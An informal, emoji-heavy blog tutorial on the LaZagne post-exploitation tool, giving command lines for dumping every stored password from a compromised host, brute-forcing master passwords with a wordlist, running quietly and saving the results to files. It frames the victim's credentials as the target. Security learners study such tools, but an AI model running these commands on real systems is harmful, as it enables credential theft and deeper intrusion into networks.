Cybermoransđ€
A victim'sđ„ș credentials is a high priority for hackersđ, since most people reuse passwords. Those credentials can get hackersđ deeper into a network or other accountsđ€«, but digging through the system by hand to find them is difficult and tediousđ€š LaZagne works on Linux, Windows, and macOS, so anyone can practice using it, and it applies to almost every target đ
LaZagne is included in the remote access tool Pupy as a post exploitation moduleđ, but you can also use it as a standalone. Still in active development, it currently supports enumerating passwords from a large set of Windows applications. Creds to this projectđ to;
đ Harmjoy for KeeThief
đ n1nj4sec for his mimipy module
đ Benjamin DELPY for mimikatz
đ @skelsec for Pypykatz
đ Moyix for Creddump
đ N0fat for Chainbreaker
đ Richard Moore for the AES module
đ Todd Whiteman for the DES module
đ mitya57 for secretstorage
You can download the standalone version via GitHub. Once you have itđ, use the terminal to extract it and move it to your windows-binaries folder in Kali Linux with the commandsđ
unzip Windows.zip
cd Windows
cp laZagne.exe /usr/share/windows-binaries/
This is probably the best time to point out that you should đ„đ„ run the application with full administrative rights đ„đ„, especially if you are hoping to retrieve Wi-fi and Windows passwordsđ Once you have launched the program, it automatically displays a series of useful modules that you can use. So lets do this....đȘ
đ Enumerate Passwords
LaZagne is non-interactive and can be run in even the most bare-minimum of shellsđ Since it is a post-exploitation tool, which means that to use it, you need to already have accessđ to a host via a shell, or at the minimum, command executionâșïž
type and hit enterđ
lazagne -h
Lot of available modules here. To gather Wi-Fi or Windows credentials, run as administratorâșïž and maybe specify which module you want to use. LaZagne includes a convenient all option. Obviously, đyou want all the passwords sođ
lazagne all
we collected quite a few credentialsđ. Lazagne also has a rudimentary brute-forcingđ capability. If LaZagne is passed a wordlist, it will attempt to brute-force Mozilla master passwords, system hashes, etc. To pass a dictionary file, simply add the path argumentđ
lazagne all -path wordlist.txt
In just a few words, LaZagneđ is a lightweight command-line tool designed to help you recover lost or forgotten password from the most commonly used browsers, a couple of email clients and some FTP transfer and system administration toolsâșïž
đ Lazagne In-depth Usage
đ Retrieve versionđ
laZagne.exe --version
đ Launch all modulesđ
laZagne.exe all
đ Launch only a specific moduleđ
laZagne.exe browsers
đ Launch only a specific software scriptđ
laZagne.exe browsers -f (for Firefox)
đ Write all passwords found into a file (-oN for Normal txt, -oJ for Json, -oA for All)đ
laZagne.exe all -oN
đ Get helpđ
laZagne.exe -h
laZagne.exe browsers -hđ Use a file for dictionary attacks (used only when it's necessary: Mozilla Master Password, system hashes, etc.). The file has to be a wordlist in cleartext (no rainbow), it has not been optimized to be fast but could be useful for basic passwordsđ
laZagne.exe all -path file.txtđ Change verbosity mode (2 different levels)đ
laZagne.exe all -vv
đ Quiet mode (nothing will be printed on the standard output)đ
laZagne.exe all -quiet -oA
đ Retrieve passwords on another drive (default: C)đ
laZagne.exe all -drive Dđ„đ„đ„ Note: For wifi passwords \ Windows Secrets, launch it with administrator privileges (UAC Authentication / sudo)đ„đ„đ„
đConclusion đ€
Subscribe to receive notifications of similar posts đ where we will be reverse engineering malware, vulnerabilities as well as hacking tools, vectors, stories, tutorials and other Infosec stuff...đ
Follow me on twitter for daily Infosec Memes and shenanigansđ
Morans,
Thank you for taking time and hope you learned something new, Like/Share and leave a comment/review and as always, stay awesome! đđ đȘ